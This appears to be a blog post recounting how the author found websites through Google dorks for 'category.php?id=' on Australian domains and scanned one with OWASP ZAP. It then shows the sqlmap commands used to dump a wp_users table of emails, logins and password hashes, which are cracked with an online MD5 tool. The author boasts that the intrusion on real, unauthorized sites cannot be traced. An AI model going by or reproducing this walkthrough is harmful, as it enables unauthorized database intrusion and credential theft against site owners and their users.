I was too curious with MySql Injection (a common vulnerability found in many websites), I started learning about it and tried to exploit couple of test websites.

After couple of tests run, Exploited in a manner that can’t be traced back.

I won’t be going with more details but will directly jump on to exploit one of the website.

For detailed theory and explanation, Ref: http://securityoverride.org/articles.php?article_id=1

Step 1. Google Dork for MySql injection,

inurl=category.php?id= site:com.au (This will list all the websites having category.php?id= in url for Australian sites.)

dork

you can refer to good links of Google Dorks for different kind of attacks,

http://www.exploit-db.com/google-dorks/

Joomla: http://www.hackerbradri.com/2012/07/google-dorks-for-jamoola.html

SQLi – RFI – LFI – Joomla http://pastebin.com/92rkBSps

WordPress: http://newexploits.com/wordpress/tag/google-dork/

Step 2: Information Gathering, Scanning

Since you have decided upon your target, we need to gather information about the target.

Information Gathering is the most important base line on which your entire POA (Plan Of Action) is depend upon.

Here I am using OWASP ZAP framework 2.0.0, Installation is pretty much straight forward. BackTrack/Kali comes with default installation of Zap.

In windows, keep clicking and installation is done. 😛 :).

https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

owasp1

owasp2

After the scanning, we got 2 vulnerabilities.

  • Cross Site Scripting
  • SQL Injection (Union Based)

step 3: Exploit the loop holes.

I’ve used SQLMap here,

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

http://sqlmap.org/

This will fetch all the DBs and will also check whether the URL is vulnerable to SQL injection.

Once done, say you have the DB, as e3xample_db. Let’s further exploit to fetch the tables.

inject1

inject2

  • Select the table and fetch the information pertaining to that table.

./sqlmap.py -u http://www.example.com.au/category.php?cat_id=1 -D example_db -T wp_users –column

we will get the names of columns in that table with datatype

  • Exploiting further,

./sqlmap.py -u http://www.example.com.au/category.php?cat_id=1 -D example_db -T wp_users -C ID,user_email,user_login,user_pass –dump

inject3

inject4

It’s done, Hacked with Password.

inject5

From the Above Snag, we couldn’t cracked the First entry.

Let’s try it online, 🙂

http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php

inject6

Cheers!!!!!!!!!!!!!!! 🙂